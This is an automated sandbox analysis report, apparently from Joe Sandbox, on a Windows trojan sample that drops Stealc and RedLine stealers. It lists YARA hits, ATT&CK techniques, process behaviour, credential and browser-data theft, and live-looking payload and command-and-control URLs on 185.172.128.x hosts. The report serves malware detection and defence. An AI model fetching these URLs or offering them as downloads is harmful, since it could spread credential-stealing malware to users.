                              Source: Yara matchFile source: 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7596, type: MEMORYSTR
                              Source: Yara matchFile source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6BC40B40
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB68EA0 sqlite3_clear_bindings,1_2_6BB68EA0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC40D60 sqlite3_bind_parameter_name,1_2_6BC40D60
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC40C40 sqlite3_bind_zeroblob,1_2_6BC40C40
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB663C0 PR_Bind,1_2_6BB663C0
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                              Windows Management Instrumentation
                              11
                              DLL Side-Loading
                              1
                              Abuse Elevation Control Mechanism
                              11
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              2
                              System Time Discovery
                              Remote Services11
                              Archive Collected Data
                              13
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts11
                              Native API
                              1
                              Windows Service
                              11
                              DLL Side-Loading
                              11
                              Deobfuscate/Decode Files or Information
                              11
                              Input Capture
                              1
                              Account Discovery
                              Remote Desktop Protocol4
                              Data from Local System
                              22
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Command and Scripting Interpreter
                              Logon Script (Windows)1
                              Windows Service
                              1
                              Abuse Elevation Control Mechanism
                              Security Account Manager3
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              1
                              Non-Standard Port
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                              Process Injection
                              3
                              Obfuscated Files or Information
                              NTDS289
                              System Information Discovery
                              Distributed Component Object Model1
                              Email Collection
                              4
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                              Software Packing
                              LSA Secrets551
                              Security Software Discovery
                              SSH11
                              Input Capture
                              125
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                              DLL Side-Loading
                              Cached Domain Credentials351
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Masquerading
                              DCSync13
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                              Process Injection
                              /etc/passwd and /etc/shadow1
                              System Owner/User Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432419 Sample: VucRf0jboS.exe Startdate: 27/04/2024 Architecture: WINDOWS Score: 100 85 download.iolo.net 2->85 87 westus2-2.in.applicationinsights.azure.com 2->87 89 7 other IPs or domains 2->89 125 Snort IDS alert for network traffic 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 18 other signatures 2->131 9 VucRf0jboS.exe 3 11 2->9         started        14 run.exe 2->14         started        signatures3 process4 dnsIp5 91 185.172.128.90, 49730, 80 NADYMSS-ASRU Russian Federation 9->91 93 185.172.128.228, 49731, 80 NADYMSS-ASRU Russian Federation 9->93 95 2 other IPs or domains 9->95 69 C:\Users\user\AppData\Local\Temp\u5qk.3.exe, PE32 9->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32 9->71 dropped 73 C:\Users\user\AppData\Local\...\relay.dll, PE32 9->73 dropped 75 2 other malicious files 9->75 dropped 133 Detected unpacking (overwrites its own PE header) 9->133 16 u5qk.0.exe 58 9->16         started        21 run.exe 6 9->21         started        23 u5qk.3.exe 14 8 9->23         started        25 WerFault.exe 21 16 9->25         started        135 Maps a DLL or memory area into another process 14->135 137 Found direct / indirect Syscall (likely to bypass EDR) 14->137 27 cmd.exe 14->27         started        file6 signatures7 process8 dnsIp9 77 185.172.128.76, 49733, 80 NADYMSS-ASRU Russian Federation 16->77 79 185.172.128.203 NADYMSS-ASRU Russian Federation 16->79 53 C:\Users\user\AppData\...\FBAKEHIEBK.exe, PE32 16->53 dropped 55 C:\Users\user\AppData\Local\...\tiktok[1].exe, PE32 16->55 dropped 57 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->57 dropped 65 11 other files (7 malicious) 16->65 dropped 97 Detected unpacking (changes PE section rights) 16->97 99 Detected unpacking (overwrites its own PE header) 16->99 101 Tries to steal Mail credentials (via file / registry access) 16->101 111 8 other signatures 16->111 29 cmd.exe 16->29         started        31 WerFault.exe 16->31         started        59 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 21->59 dropped 61 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 21->61 dropped 103 Maps a DLL or memory area into another process 21->103 105 Found direct / indirect Syscall (likely to bypass EDR) 21->105 33 cmd.exe 4 21->33         started        81 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->81 107 Checks if the current machine is a virtual machine (disk enumeration) 23->107 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 23->37         started        63 C:\Users\user\AppData\Local\Temp\nkho, PE32 27->63 dropped 109 Writes to foreign memory regions 27->109 39 conhost.exe 27->39         started        41 MSBuild.exe 27->41         started        file10 signatures11 process12 file13 43 FBAKEHIEBK.exe 29->43         started        46 conhost.exe 29->46         started        67 C:\Users\user\AppData\Local\Temp\ssfwvk, PE32 33->67 dropped 113 Writes to foreign memory regions 33->113 115 Found hidden mapped module (file has been removed from disk) 33->115 117 Maps a DLL or memory area into another process 33->117 48 MSBuild.exe 33->48         started        51 conhost.exe 33->51         started        119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->119 121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->121 123 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->123 signatures14 process15 dnsIp16 139 Multi AV Scanner detection for dropped file 43->139 83 91.215.85.66 PINDC-ASRU Russian Federation 48->83 141 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->141 143 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 48->143 145 Tries to harvest and steal browser information (history, passwords, etc) 48->145 signatures17

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              VucRf0jboS.exe45%ReversingLabsWin32.Trojan.Generic
                              VucRf0jboS.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\nkho100%AviraHEUR/AGEN.1307453
                              C:\Users\user\AppData\Local\Temp\ssfwvk100%AviraHEUR/AGEN.1307453
                              C:\Users\user\AppData\Local\Temp\nkho100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\ssfwvk100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\u5qk.0.exe100%Joe Sandbox ML
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe47%ReversingLabsWin32.Spyware.Stealc
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe47%ReversingLabsWin32.Spyware.Stealc
                              C:\Users\user\AppData\Local\Temp\nkho65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                              C:\Users\user\AppData\Local\Temp\ssfwvk65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                              C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\u5qk.3.exe4%ReversingLabs
                              C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Roaming\SecureClient\relay.dll0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://www.indyproject.org/0%URL Reputationsafe
                              https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts0%URL Reputationsafe
                              https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B0%URL Reputationsafe
                              http://ocsp.sectigo.com00%URL Reputationsafe
                              https://sectigo.com/CPS0D0%URL Reputationsafe
                              http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/freebl3.dll50%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/softokn3.dll0%Avira URL Cloudsafe
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-0%Avira URL Cloudsafe
                              http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts0%Avira URL Cloudsafe
                              http://185.172.128.59/syncUpd.exe100%Avira URL Cloudmalware
                              185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                              http://185.172.128.228/BroomSetup.exe0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/sqlite3.dll0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/nss3.dllg0%Avira URL Cloudsafe
                              http://185.172.128.228/ping.php?substr=two100%Avira URL Cloudmalware
                              http://185.172.128.760%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/nss3.dll0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/mozglue.dll0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/nss3.dll20%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exe100%Avira URL Cloudmalware
                              http://185.172.128.76/15f649199f40275b/softokn3.dllS0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.php9bc63c5c878de6304643d64e61fb8releaseccbd010d5db7d1a32561c90%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exe000%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/msvcp140.dll0%Avira URL Cloudsafe
                              http://185.172.128.76Z0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              iolo0.b-cdn.net
                              185.93.1.247
                              truefalse
                                high
                                note.padd.cn.com
                                176.97.76.106
                                truefalse
                                  unknown
                                  svc.iolo.com
                                  20.157.87.45
                                  truefalse
                                    high
                                    fp2e7a.wpc.phicdn.net
                                    192.229.211.108
                                    truefalse
                                      unknown
                                      download.iolo.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        westus2-2.in.applicationinsights.azure.com
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          http://185.172.128.228/BroomSetup.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                          • Avira URL Cloud: safe
                                          low
                                          http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.172.128.59/syncUpd.exefalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://185.172.128.228/ping.php?substr=twofalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.172.128.203/tiktok.exefalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://svc.iolo.com/__svc/sbv/DownloadManager.ashxfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabMSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://monitor.azure.com//.defaultSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.vmware.com/0run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://snapshot.monitor.azure.com/&SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u5qk.3.exe, 00000009.00000003.2489838469.0000000002839000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.00000000027D6000.00000004.00001000.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                          high
                                                          https://www.iolo.com/company/legal/sales-policy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.indyproject.org/VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmp, u5qk.3.exe, 00000009.00000003.2489838469.0000000002832000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://support.iolo.com/support/solutions/articles/44001781185?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                              high
                                                              https://www.iolo.com/company/legal/privacy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                high
                                                                http://185.172.128.76/15f649199f40275b/freebl3.dll5u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.codeplex.com/CompositeWPFSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                  high
                                                                  https://support.iolo.com/support/solutions/articles/44001781185SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://scripts.sil.org/OFLSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB461000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://taskscheduler.codeplex.com/HSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                        high
                                                                        https://www.iolo.com/company/legal/sales-policy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                          high
                                                                          https://scripts.sil.org/OFLX8SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://westus2-2.in.applicationinsights.azure.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dc.services.visualstudio.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://snapshot.monitor.azure.com/XSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
